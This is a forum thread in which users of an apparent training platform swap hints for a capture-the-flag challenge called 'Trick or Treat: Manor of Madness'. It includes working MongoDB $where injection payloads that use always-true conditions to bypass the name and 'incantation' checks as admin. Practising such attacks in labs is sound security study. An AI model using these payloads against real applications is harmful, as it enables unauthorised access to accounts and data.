Forum Discussion
immervivesolver
Bronze III
2 months agoTrick or Treat: Manor of Madness
Any hints or close payloads for last task
- 2 months ago
This should nudge you in the right direction - MongoDB $where operator JavaScript injection - Web Application Vulnerabilities | Invicti
PRABAKARANRAMAMURTHY
Bronze III
24 days agoHi Samh051,
This query worked for you in the last question?
immervivesolver
Bronze III
23 days ago{“$where":"this.name == ‘admin’||’1’==‘1’&& this.incantation == ‘admin’||’1’==‘1’“}
PRABAKARANRAMAMURTHY
- PRABAKARANRAMAMURTHY23 days ago
Bronze III
Thank you immervivesolver.
This worked:
{"$where":"this.name=='admin'||'1==1' && this.incantation =='admin'||'1==1'"}